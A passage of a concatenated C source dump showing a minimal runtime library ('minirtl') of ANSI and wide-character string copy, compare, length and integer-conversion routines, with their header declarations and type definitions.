19 | 
20 | 	*p = 0;
21 | 	return dest;
22 | }
23 | 
24 | wchar_t *_strcpy_w(wchar_t *dest, const wchar_t *src)
25 | {
26 | 	wchar_t *p;
27 | 
28 | 	if ((dest == 0) || (src == 0))
29 | 		return dest;
30 | 
31 | 	if (dest == src)
32 | 		return dest;
33 | 
34 | 	p = dest;
35 | 	while ( *src!=0 ) {
36 | 		*p = *src;
37 | 		p++;
38 | 		src++;
39 | 	} 
40 | 
41 | 	*p = 0;
42 | 	return dest;
43 | }
44 | 


--------------------------------------------------------------------------------
/Shared/_strend.c:
--------------------------------------------------------------------------------
 1 | #include "rtltypes.h"
 2 | 
 3 | char *_strend_a(const char *s)
 4 | {
 5 | 	if ( s==0 )
 6 | 		return 0;
 7 | 
 8 | 	while ( *s!=0 )
 9 | 		s++;
10 | 
11 | 	return (char *)s;
12 | }
13 | 
14 | wchar_t *_strend_w(const wchar_t *s)
15 | {
16 | 	if ( s==0 )
17 | 		return 0;
18 | 
19 | 	while ( *s!=0 )
20 | 		s++;
21 | 
22 | 	return (wchar_t *)s;
23 | }
24 | 


--------------------------------------------------------------------------------
/Shared/_strlen.c:
--------------------------------------------------------------------------------
 1 | #include "rtltypes.h"
 2 | 
 3 | size_t _strlen_a(const char *s)
 4 | {
 5 | 	char *s0 = (char *)s;
 6 | 
 7 | 	if ( s==0 )
 8 | 		return 0;
 9 | 
10 | 	while ( *s!=0 )
11 | 		s++;
12 | 
13 | 	return (s-s0);
14 | }
15 | 
16 | size_t _strlen_w(const wchar_t *s)
17 | {
18 | 	wchar_t *s0 = (wchar_t *)s;
19 | 
20 | 	if ( s==0 )
21 | 		return 0;
22 | 
23 | 	while ( *s!=0 )
24 | 		s++;
25 | 
26 | 	return (s-s0);
27 | }
28 | 


--------------------------------------------------------------------------------
/Shared/_strncmp.c:
--------------------------------------------------------------------------------
 1 | #include "rtltypes.h"
 2 | 
 3 | int _strncmp_a(const char *s1, const char *s2, size_t cchars)
 4 | {
 5 | 	char c1, c2;
 6 | 
 7 | 	if ( s1==s2 )
 8 | 		return 0;
 9 | 
10 | 	if ( s1==0 )
11 | 		return -1;
12 | 
13 | 	if ( s2==0 )
14 | 		return 1;
15 | 
16 | 	if ( cchars==0 )
17 | 		return 0;
18 | 
19 | 	do {
20 | 		c1 = *s1;
21 | 		c2 = *s2;
22 | 		s1++;
23 | 		s2++;
24 | 		cchars--;
25 | 	} while ( (c1 != 0) && (c1 == c2) && (cchars>0) );
26 | 	
27 | 	return (int)(c1 - c2);
28 | }
29 | 
30 | int _strncmp_w(const wchar_t *s1, const wchar_t *s2, size_t cchars)
31 | {
32 | 	wchar_t c1, c2;
33 | 
34 | 	if ( s1==s2 )
35 | 		return 0;
36 | 
37 | 	if ( s1==0 )
38 | 		return -1;
39 | 
40 | 	if ( s2==0 )
41 | 		return 1;
42 | 
43 | 	if ( cchars==0 )
44 | 		return 0;
45 | 
46 | 	do {
47 | 		c1 = *s1;
48 | 		c2 = *s2;
49 | 		s1++;
50 | 		s2++;
51 | 		cchars--;
52 | 	} while ( (c1 != 0) && (c1 == c2) && (cchars>0) );
53 | 	
54 | 	return (int)(c1 - c2);
55 | }
56 | 


--------------------------------------------------------------------------------
/Shared/_strncmpi.c:
--------------------------------------------------------------------------------
 1 | #include "rtltypes.h"
 2 | 
 3 | int _strncmpi_a(const char *s1, const char *s2, size_t cchars)
 4 | {
 5 | 	char c1, c2;
 6 | 
 7 | 	if ( s1==s2 )
 8 | 		return 0;
 9 | 
10 | 	if ( s1==0 )
11 | 		return -1;
12 | 
13 | 	if ( s2==0 )
14 | 		return 1;
15 | 
16 | 	if ( cchars==0 )
17 | 		return 0;
18 | 
19 | 	do {
20 | 		c1 = locase_a(*s1);
21 | 		c2 = locase_a(*s2);
22 | 		s1++;
23 | 		s2++;
24 | 		cchars--;
25 | 	} while ( (c1 != 0) && (c1 == c2) && (cchars>0) );
26 | 	
27 | 	return (int)(c1 - c2);
28 | }
29 | 
30 | int _strncmpi_w(const wchar_t *s1, const wchar_t *s2, size_t cchars)
31 | {
32 | 	wchar_t c1, c2;
33 | 
34 | 	if ( s1==s2 )
35 | 		return 0;
36 | 
37 | 	if ( s1==0 )
38 | 		return -1;
39 | 
40 | 	if ( s2==0 )
41 | 		return 1;
42 | 
43 | 	if ( cchars==0 )
44 | 		return 0;
45 | 
46 | 	do {
47 | 		c1 = locase_w(*s1);
48 | 		c2 = locase_w(*s2);
49 | 		s1++;
50 | 		s2++;
51 | 		cchars--;
52 | 	} while ( (c1 != 0) && (c1 == c2) && (cchars>0) );
53 | 	
54 | 	return (int)(c1 - c2);
55 | }
56 | 


--------------------------------------------------------------------------------
/Shared/_strncpy.c:
--------------------------------------------------------------------------------
 1 | #include "rtltypes.h"
 2 | 
 3 | char *_strncpy_a(char *dest, size_t ccdest, const char *src, size_t ccsrc)
 4 | {
 5 | 	char *p;
 6 | 
 7 | 	if ( (dest==0) || (src==0) || (ccdest==0) )
 8 | 		return dest;
 9 | 
10 | 	ccdest--;
11 | 	p = dest;
12 | 
13 | 	while ( (*src!=0) && (ccdest>0) && (ccsrc>0) ) {
14 | 		*p = *src;
15 | 		p++;
16 | 		src++;
17 | 		ccdest--;
18 | 		ccsrc--;
19 | 	}
20 | 
21 | 	*p = 0;
22 | 	return dest;
23 | }
24 | 
25 | wchar_t *_strncpy_w(wchar_t *dest, size_t ccdest, const wchar_t *src, size_t ccsrc)
26 | {
27 | 	wchar_t *p;
28 | 
29 | 	if ( (dest==0) || (src==0) || (ccdest==0) )
30 | 		return dest;
31 | 
32 | 	ccdest--;
33 | 	p = dest;
34 | 
35 | 	while ( (*src!=0) && (ccdest>0) && (ccsrc>0) ) {
36 | 		*p = *src;
37 | 		p++;
38 | 		src++;
39 | 		ccdest--;
40 | 		ccsrc--;
41 | 	}
42 | 
43 | 	*p = 0;
44 | 	return dest;
45 | }
46 | 


--------------------------------------------------------------------------------
/Shared/minirtl.h:
--------------------------------------------------------------------------------
  1 | /*
  2 | Module name:
  3 | 	minirtl.h
  4 | 
  5 | Description:
  6 | 	header for string handling and conversion routines
  7 | 
  8 | Date:
  9 | 	1 Mar 2015
 10 | */
 11 | 
 12 | #ifndef _MINIRTL_
 13 | #define _MINIRTL_
 14 | 
 15 | // string copy/concat/length
 16 | 
 17 | char *_strend_a(const char *s);
 18 | wchar_t *_strend_w(const wchar_t *s);
 19 | 
 20 | char *_strcpy_a(char *dest, const char *src);
 21 | wchar_t *_strcpy_w(wchar_t *dest, const wchar_t *src);
 22 | 
 23 | char *_strcat_a(char *dest, const char *src);
 24 | wchar_t *_strcat_w(wchar_t *dest, const wchar_t *src);
 25 | 
 26 | char *_strncpy_a(char *dest, size_t ccdest, const char *src, size_t ccsrc);
 27 | wchar_t *_strncpy_w(wchar_t *dest, size_t ccdest, const wchar_t *src, size_t ccsrc);
 28 | 
 29 | size_t _strlen_a(const char *s);
 30 | size_t _strlen_w(const wchar_t *s);
 31 | 
 32 | // comparing
 33 | 
 34 | int _strcmp_a(const char *s1, const char *s2);
 35 | int _strcmp_w(const wchar_t *s1, const wchar_t *s2);
 36 | 
 37 | int _strncmp_a(const char *s1, const char *s2, size_t cchars);
 38 | int _strncmp_w(const wchar_t *s1, const wchar_t *s2, size_t cchars);
 39 | 
 40 | int _strcmpi_a(const char *s1, const char *s2);
 41 | int _strcmpi_w(const wchar_t *s1, const wchar_t *s2);
 42 | 
 43 | int _strncmpi_a(const char *s1, const char *s2, size_t cchars);
 44 | int _strncmpi_w(const wchar_t *s1, const wchar_t *s2, size_t cchars);
 45 | 
 46 | char *_strstr_a(const char *s, const char *sub_s);
 47 | wchar_t *_strstr_w(const wchar_t *s, const wchar_t *sub_s);
 48 | 
 49 | char *_strstri_a(const char *s, const char *sub_s);
 50 | wchar_t *_strstri_w(const wchar_t *s, const wchar_t *sub_s);
 51 | 
 52 | // conversion of integer types to string, returning string length
 53 | 
 54 | size_t ultostr_a(unsigned long x, char *s);
 55 | size_t ultostr_w(unsigned long x, wchar_t *s);
 56 | 
 57 | size_t ultohex_a(unsigned long x, char *s);
 58 | size_t ultohex_w(unsigned long x, wchar_t *s);
 59 | 
 60 | size_t itostr_a(int x, char *s);
 61 | size_t itostr_w(int x, wchar_t *s);
 62 | 
 63 | size_t i64tostr_a(signed long long x, char *s);
 64 | size_t i64tostr_w(signed long long x, wchar_t *s);
 65 | 
 66 | size_t u64tostr_a(unsigned long long x, char *s);
 67 | size_t u64tostr_w(unsigned long long x, wchar_t *s);
 68 | 
 69 | size_t u64tohex_a(unsigned long long x, char *s);
 70 | size_t u64tohex_w(unsigned long long x, wchar_t *s);
 71 | 
 72 | // string to integers conversion
 73 | 
 74 | unsigned long strtoul_a(char *s);
 75 | unsigned long strtoul_w(wchar_t *s);
 76 | 
 77 | unsigned long long strtou64_a(char *s);
 78 | unsigned long long strtou64_w(wchar_t *s);
 79 | 
 80 | unsigned long hextoul_a(char *s);
 81 | unsigned long hextoul_w(wchar_t *s);
 82 | 
 83 | int strtoi_a(char *s);
 84 | int strtoi_w(wchar_t *s);
 85 | 
 86 | signed long long strtoi64_a(char *s);
 87 | signed long long strtoi64_w(wchar_t *s);
 88 | 
 89 | unsigned long long hextou64_a(char *s);
 90 | unsigned long long hextou64_w(wchar_t *s);
 91 | 
 92 | /* =================================== */
 93 | 
 94 | #ifdef UNICODE
 95 | 
 96 | #define _strend _strend_w
 97 | #define _strcpy _strcpy_w
 98 | #define _strcat _strcat_w
 99 | #define _strlen _strlen_w
100 | #define _strncpy _strncpy_w
101 | 
102 | #define _strcmp _strcmp_w
103 | #define _strncmp _strncmp_w
104 | #define _strcmpi _strcmpi_w
105 | #define _strncmpi _strncmpi_w
106 | #define _strstr _strstr_w
107 | #define _strstri _strstri_w
108 | 
109 | #define ultostr ultostr_w
110 | #define ultohex ultohex_w
111 | #define itostr itostr_w
112 | #define i64tostr i64tostr_w
113 | #define u64tostr u64tostr_w
114 | #define u64tohex u64tohex_w
115 | 
116 | #define strtoul strtoul_w
117 | #define hextoul hextoul_w
118 | #define strtoi strtoi_w
119 | #define strtoi64 strtoi64_w
120 | #define strtou64 strtou64_w
121 | #define hextou64 hextou64_w
122 | 
123 | #else // ANSI
124 | 
125 | #define _strend _strend_a
126 | #define _strcpy _strcpy_a
127 | #define _strcat _strcat_a
128 | #define _strlen _strlen_a
129 | #define _strncpy _strncpy_a
130 | #define _strcmp _strcmp_a
131 | 
132 | #define _strcmp _strcmp_a
133 | #define _strncmp _strncmp_a
134 | #define _strcmpi _strcmpi_a
135 | #define _strncmpi _strncmpi_a
136 | #define _strstr _strstr_a
137 | #define _strstri _strstri_a
138 | 
139 | #define ultostr ultostr_a
140 | #define ultohex ultohex_a
141 | #define itostr itostr_a
142 | #define i64tostr i64tostr_a
143 | #define u64tostr u64tostr_a
144 | #define u64tohex u64tohex_a
145 | 
146 | #define strtoul strtoul_a
147 | #define hextoul hextoul_a
148 | #define strtoi strtoi_a
149 | #define strtoi64 strtoi64_a
150 | #define strtou64 strtou64_a
151 | #define hextou64 hextou64_a
152 | 
153 | #endif
154 | 
155 | #endif /* _MINIRTL_ */
156 | 


--------------------------------------------------------------------------------
/Shared/rtltypes.h:
--------------------------------------------------------------------------------
 1 | #ifndef _WCHAR_T_DEFINED
 2 | typedef unsigned short wchar_t;
 3 | #define _WCHAR_T_DEFINED
 4 | #endif  /* _WCHAR_T_DEFINED */
 5 | 
 6 | #ifndef _SIZE_T_DEFINED
 7 | #ifdef _WIN64
 8 | typedef unsigned __int64    size_t;
 9 | #else  /* _WIN64 */
10 | typedef __w64 unsigned int   size_t;
11 | #endif  /* _WIN64 */
12 | #define _SIZE_T_DEFINED
13 | #endif  /* _SIZE_T_DEFINED */
14 | 
15 | __forceinline char locase_a(char c)
16 | {
17 | 	if ((c >= 'A') && (c <= 'Z'))
18 | 		return c + 0x20;
19 | 	else
20 | 		return c;
21 | }
22 | 
23 | __forceinline wchar_t locase_w(wchar_t c)
24 | {
25 | 	if ((c >= 'A') && (c <= 'Z'))
26 | 		return c + 0x20;
27 | 	else
28 | 		return c;
29 | }
30 | 
31 | __forceinline char byteabs(char x) {
32 | 	if (x < 0)
33 | 		return -x;
34 | 	return x;
35 | }
36 | 
37 | __forceinline int _isdigit_a(char x) {
38 | 	return ((x >= '0') && (x <= '9'));
39 | }
40 | 
41 | __forceinline int _isdigit_w(wchar_t x) {
42 | 	return ((x >= L'0') && (x <= L'9'));
43 | }
44 | 


--------------------------------------------------------------------------------
/Shared/strtoul.c:
--------------------------------------------------------------------------------
 1 | #include "rtltypes.h"
 2 | 
 3 | unsigned long strtoul_a(char *s)
 4 | {
 5 | 	unsigned long	a = 0;
 6 | 	char			c;
 7 | 
 8 | 	if (s == 0)
 9 | 		return 0;
10 | 
11 | 	while (*s != 0) {
12 | 		c = *s;
13 | 		if (_isdigit_w(c))
14 | 			a = (a*10)+(c-'0');
15 | 		else
16 | 			break;
17 | 		s++;
18 | 	}
19 | 	return a;
20 | }
21 | 
22 | unsigned long strtoul_w(wchar_t *s)
23 | {
24 | 	unsigned long	a = 0;
25 | 	wchar_t			c;
26 | 
27 | 	if (s == 0)
28 | 		return 0;
29 | 
30 | 	while (*s != 0) {
31 | 		c = *s;
32 | 		if (_isdigit_w(c))
33 | 			a = (a*10)+(c-L'0');
34 | 		else
35 | 			break;
36 | 		s++;
37 | 	}
38 | 	return a;
39 | }
40 | 


--------------------------------------------------------------------------------
/Shared/ultostr.c:
--------------------------------------------------------------------------------
 1 | #include "rtltypes.h"
 2 | 
 3 | size_t ultostr_a(unsigned long x, char *s)
 4 | {
 5 | 	unsigned long	t=x;
 6 | 	size_t			i, r=1;
 7 | 
 8 | 	while ( t >= 10 ) {
 9 | 		t /= 10;
10 | 		r++;
11 | 	}
12 | 
13 | 	if (s == 0)
14 | 		return r;
15 | 	
16 | 	for (i = r; i != 0; i--) {
17 | 		s[i-1] = (char)(x % 10) + '0';
18 | 		x /= 10;
19 | 	}
20 | 
21 | 	s[r] = (char)0;
22 | 	return r;
23 | }
24 | 
25 | size_t ultostr_w(unsigned long x, wchar_t *s)
26 | {
27 | 	unsigned long	t=x;
28 | 	size_t			i, r=1;
29 | 
30 | 	while ( t >= 10 ) {
31 | 		t /= 10;
32 | 		r++;
33 | 	}
34 | 
35 | 	if (s == 0)
36 | 		return r;
37 | 	
38 | 	for (i = r; i != 0; i--) {
39 | 		s[i-1] = (wchar_t)(x % 10) + L'0';
40 | 		x /= 10;
41 | 	}
42 | 
43 | 	s[r] = (wchar_t)0;
44 | 	return r;
45 | }
46 | 


--------------------------------------------------------------------------------